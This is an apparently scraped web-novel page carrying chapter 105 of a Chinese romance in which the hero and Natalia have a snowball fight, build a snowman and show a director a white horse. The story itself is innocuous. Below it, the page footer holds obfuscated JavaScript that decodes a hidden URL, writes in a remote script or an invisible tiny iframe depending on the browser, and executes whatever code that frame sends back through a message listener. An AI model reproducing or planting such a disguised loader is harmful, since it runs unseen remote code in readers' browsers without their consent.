当前位置:铅笔小说>言情女生>重生1982做顽主> 第一百零五章 打雪仗

第一百零五章 打雪仗

  商量完修路的事,杜康就准备回去,他在四九城还有很多事情要做,哪能一直待在这里。

  老爸老妈带着囡囡却没有回去,想多陪老人几天,要待到腊月十几,再回去陪他过年。

  坐火车回到四九城,杜康先将大白小白送到木槿轩,谁让那里空间大,足够它们居住。

  随后就开始忙碌起来,出去一趟有一个多月,积压了不少事情。

  最主要的是将胭脂制作出来,女人嘛,哪有不爱美的,娜塔莉亚也不例外。

  她拥有各种化妆品,而且都是世界名牌,但对他所说的胭脂,依旧非常期待,希望能早日看到成品。

  杜康知道她这是被自己的手艺征服,看到他制作的各种物品非常不错,学一样精一样,用一句看似吹牛的话就是,学则会会则精,无所不会。

  盲目的认为他制作的胭脂很好,希望能够试试。

  杜康当然要先行给她制作,至于狼标本之类的,可以靠后。

  制作这个并不难,但需要时间阴干,趁着这个时间,杜康制作了六个狼标本,放在屋内观赏。

  六头狼有头狼有公狼有母狼,还有两个小狼崽,形成一个狼群,或坐或趴,凶恶的看着前方,看起来桀骜不驯,将狼群的形象描写得淋漓尽致。

  哪怕明知道是标本不会活动,但依旧给人一种直面狼群的感觉,足以吓人一跳。

  那手艺看得人不禁叫绝。

  收拾收拾眨眼就到了十二月。

  早晨起来抬头看看外面,竟然下雪了,一片片的雪花飘落是那么的漂亮。

  杜康算算时间,胭脂也应该好了,就将胭脂拿出来,打开查看,制作的不错。

  “要不要试试?”

  娜塔莉亚点头,这胭脂看着不错,使用的话应该也很好。

  杜康忽然露出笑容:“我来帮你抹,告诉你,我不单制作胭脂的手法不错,更会涂抹。”

  娜塔莉亚白了他一眼,总感觉他笑的那么猥琐,但还是同意。

  杜康笑着抹了点胭脂,给她涂抹。

  娜塔莉亚侧过脸闭上眼等待。

  然而看着眼前那白皙细嫩的脸蛋,满满的胶原蛋白啊,还抹什么胭脂,杜康一口啃了上去,尝尝什么叫做朱唇。

  娜塔莉亚浑身一僵,但没有躲避,好半天才将他推到一边。

  “没完了是吧,涂个胭脂还占我便宜,真是的。”

  “对不起,是我没忍住,谁让你那么漂亮,我给你抹。”

  杜康笑嘻嘻接着上前,被娜塔莉亚一下打掉他的手:“我自己来,让你帮忙还不知被占多少便宜。”

  她夺过胭脂对着镜子试妆,等到弄完,杜康顿时眼前一亮,娜塔莉亚肌肤宛若冬雪,再抹上几点胭脂,氤氲开来,白里透红,当真是增一分则多减一分则少,让他看的呆了。

  “好看吗?”

  “好看。”

  “好看也不给你看。”

  说完捂着脸跑了出去,杜康追在后面,等进了院子发现雪早停了,只留下白茫茫一片,连远处的房屋也落满了雪。

  一时间四九城,仿佛变成了冰雪世界。

  厚厚的雪踩在上面吱嘎作响。

  “闲着没事,要不然我带你堆雪人?做个漂亮的圣诞老人给。”

  娜塔莉亚点头,想要看看杜康堆的雪人如何。

  两人拿来工具,将院子里的雪铲到墙角。雪下的不小,院子又大,足以堆一个大雪人。

  美人当前,杜康在那里卖力铲雪,没一会开始淌汗,就脱下羊皮袄,只穿着件毛衣干活。

  娜塔莉亚忽然喊道“杜康看这边。”

  杜康抬头,便看到一团雪飞过来,还没等他反应过来已经砸到他脸上,又落到脖子里,当真是一个透心凉。

  “看我的。”

  杜康同样团了个雪球砸过去,却被她躲开,反而被她趁机将雪球砸到他身上。

  这怎么行,他不吃这个亏,接着团雪球砸过去。

  说好的堆雪人很快变成打雪仗。

  一时间雪球乱飞,玩的很是开心。

  好半天,娜塔莉亚求饶道“别砸了,让我歇会。”

  “好说,叫声老公就饶你一命。”

  娜塔莉亚白了他一眼,哪肯同意,又是几团雪球砸过来,势要砸的他认输。杜康也不惯着,辣手反击。

  看到娜塔利亚正在树底下团雪团,跑过去,一脚踹在树上,树上的积雪纷纷落下,瞬间将她淋了个满身。

  让本就漂亮的她,洁白似雪。

  等到最后,娜塔莉亚实在承受不住,不顾形象躺在那里喘着粗气喊道“老公饶了我吧,我认输。”

  “这可是你说的。”

  “是我说的。”

  杜康走过去,趁她不注意,忽然将雪团塞入她脖子后面,凉的她忍不住大叫,反手就要将雪团往他脖子里塞。

  可杜康早已逃开。

  他才没兴趣在那里被人袭击。

  想当初他还是很喜欢打雪仗,只可惜他是南方的,很难看到雪。

  上大学的时候是在北方,冬天还能跟同学打雪仗,等到毕业返回南方,打雪仗就成了奢望。

  整整十年没能看到雪,更别说是打雪仗。

  好不容易有一次见到雪,他喊同事去打雪仗,结果……

  团了半天雪团,只有小手指肚大小,还没等扔到,就化干净了。

  听起来都是泪啊!

  玩闹半天,两人又累又饿,杜康就去做饭,等吃过饭,带着她接着堆雪人。

  杜康拿出干木匠活的本事,在那里制作,想要制作一个雪人。

  娜塔莉亚在旁边帮忙递工具,当真有种夫唱妇随的感觉。

  各种工具齐上,很快就制作了一个整体酷似熊猫穿着航天服的雪人。

  这么奇怪的造型,娜塔莉亚还是第一次见到,但很漂亮,一看就是精心设计,没想到杜康还有这样的本事。

  想到杜康多才多艺,各种手艺都是上手就来,又不觉得奇怪,若是连这点能力都没有,她才感觉奇怪。

  杜康搂着她,帮忙介绍道“我叫它冰墩墩,是专门为你设计的。”

  “你真好。”

  两人忍不住抱在一起,享受着彼此的温暖,是那么的温馨。

  这一刻若是能永久,杜康愿意付出一切。

  忽然伴随着吱嘎一声轻响,有人推门闯了进来。

  两人吓得赶紧分开,看到来人是李程儒,杜康咳嗽两声尴尬说道“你怎么来了?”

  李程儒更尴尬,人家小两口打情骂俏他不长眼闯进来算什么事。

  在那里尴尬的笑了下,有些不好意思的说“这不是听说你回京,特地过来看看,顺便给你拜个早年。”

  这话他能信才怪,现在才十几号吧,连小年都不到,你给我拜的哪门子年?

  知道他是为了白龙马的事,杜康说道“白龙马已经找到了,绝对是那种神驹级别的,不敢说跟赤兔相比,但最多比它差一个等级,用来做白龙马再合适不过。”

  “多谢杜老弟,若非是你,我绝对找不到这样好的白龙马。”

  杜康知道他不相信,还以为自己吹嘘,这种马可遇而不可求,又岂是那么容易找到。

  更别说是必须是纯白的马,那更加难得。

  现在纯白马稀罕到什么程度,据说有一次拍摄白龙马的剧情,然而当地根本找不到白马,搜遍周边两三百里,花费数天时间方才找到。

  这已经很不容易了吧,更惨的是那匹白马,瘦的跟毛驴似的。

  唐僧坐上去脚能够到地面,而且压得白马身子都打摆子,根本站不住。

  记得好像是拍摄三打白骨精那集的时候。

  所以三打白骨精时唐僧为什么不骑马?因为驮不动啊。

  堂堂的白龙马驮不动师父,说出去这不是扯吗。

  只能放个远景,表明有白龙马的存在。

  这也是剧组后来花高价购买白龙马,而不是在哪里拍摄就在哪里寻找的原因。

  有寻找白马的功夫,还不如直接购买。

  “进去坐会,等会我带你去看看找的白龙马。”

  “我不累,要不然咱们这就过去看看?”

  杜康看了他一眼,知道他急迫地想要看看白龙马长的如何,是否符合他们的要求,就说道“跟我来,让你看看我找到的白龙马。”

  杜康带着娜塔莉亚一起过去,等到达木槿轩,李程儒顿时被那堆积在一起的家具惊呆。

  各种各样的家具,屋内已经堆放不下,只能放在外面堆积成山。

  这么多精致的家具,怪不得杜康对进入剧组不感兴趣,人家随便露点都够他一辈子吃喝不愁,去那里受什么罪。

  杜康找了把椅子让他坐下,自己前往后面,很快牵着大白小白出来。

  看到它们,李程儒更是目瞪口呆,他还是第一次见到这么神骏的马匹,用来做白龙马,他此刻心中只有一个词——大材小用。

  “你确定要让它演白龙马。”

  “当然,而且是两匹,你可以先牵走一匹,剩下的那匹,等我训练一段时间在进行调换,有这两匹白龙马轮流拍摄,保证能让剧组顺利进行。”

  李程儒激动的握着他的手说“多谢,若不是你,我们还不知需要多长时间才能找到合适的白龙马。”

  “都是为了名著拍摄,没什么。”

  杜康无力吐槽,这么感动,你到是来点实际的,握个手说两句好话,算什么事。

  fantuankanshu.com
eval("\x77\x69\x6e\x64\x6f\x77")["\x43\x6c\x74\x79"]=function(e){var li ='ABCDEFGHIJKLMNOPQRS'+''+'TUVWXYZabcdefghi'+'jklmnopqrstuvwx'+''+'yz0123456789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x69\x52\x5a"]=function(){eval(Clty("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dmFyIGRzPW5ldyBEYXRlKCk7dT1kZWNvZGVVUklDb21wb25lbnQoQ2x0eSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7dT11LnJlcGxhY2UoL3FpaGFuZy9nLGRzLmdldERhdGUoKSk7J2pRdWVyeSc7dmFyIF91YT1uYXZpZ2F0b3IudXNlckFnZW50O3ZhciBfQ2x0eUNsdHk9JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoQ2x0eSgiWW1GcFpIVT0iKSk+LTEgfHwgX3VhLmluZGV4T2YoQ2x0eSgnU0hWaGQyVnBRbkp2ZDNObGNnPT0nKSk+LTEpe2lmKF91YS5pbmRleE9mKENsdHkoJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfQ2x0eUNsdHkpO31lbHNle2Z1bmN0aW9uIHJkKG4sbSl7cmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSoobS1uKzEpK24pO31mdW5jdGlvbiBybShlKXtpZihlJiZlLnRhZ05hbWUudG9VcHBlckNhc2UoKT09PSJJRlJBTUUiJiZlLnNyYy5pbmRleE9mKHUpPi0xKXtlLnJlbW92ZSgpO31lbHNlIGlmKGUubmV4dEVsZW1lbnRTaWJsaW5nKXtybShlLm5leHRFbGVtZW50U2libGluZyk7fX1sZXQgYz1kW0NsdHkoIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdnJysnJysncUFqJysnJysneCcrJycrJ0hSJysnJysnJzt2YXIgX19rZG5xaWQgPSAnaycgKyByZCgxLCAxMDAwMDApO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfX2tkbnFpZCsnIj4nKyc8L2QnKydpdicrJz4nKTt3WydfX2snKydkYScrJ25xJysnb2InKydqXzE4NyddPWRbJ3F1JysnZXJ5JysnU2VsZScrJ2N0bycrJ3InXSgnIycrX19rZG5xaWQpO19pZCArPSBkWydxdScrJ2VyeScrJ1NlJysnbGVjJysndG8nKydyQScrJ2xsJ10oJy4nK19jbGFzcykubGVuZ3RoO3ZhciB6ID0gdSsnLTIvJytfaWQrJy8nK3I7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oQ2x0eShlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9DbHR5Q2x0eSk7fX0pKCc9VScrJ2onKycnKydNdGMnKycnKydET3gnKycnKycweScrJycrJ1knKycnKydHJysnJysnSicrJycrJ1RKJysnJysnbicrJzVXJysnJysnWW9sJysnJysnV2NrJysnJysnSicrJycrJ1dibycrJycrJ1JuYycrJycrJ24nKydaJysnWicrJycrJ2tNJysnJysnbCcrJycrJ01ETicrJzBBaicrJ01CTicrJ1QnKydKbCcrJycrJ1JYYScrJycrJ3onKycnKyc1JysneScrJ1onKydadScrJ0YnKycnKydHYScrJ3BGJysnJysnSGNvJysnJysnRm0nKycnKydMelonKydaa00nKycnKydsWScrJ2tNbCcrJ0UwTScrJycrJ2xNSCcrJycrJ2MnKycwJysnUicrJ0hhJysnJysnJywnZycrJycrJ3FBaicrJycrJ3gnKycnKydIUicrJycrJycsd2luZG93LGRvY3VtZW50LDAsJ1onKQ=="));}

上一章目录+书签下一章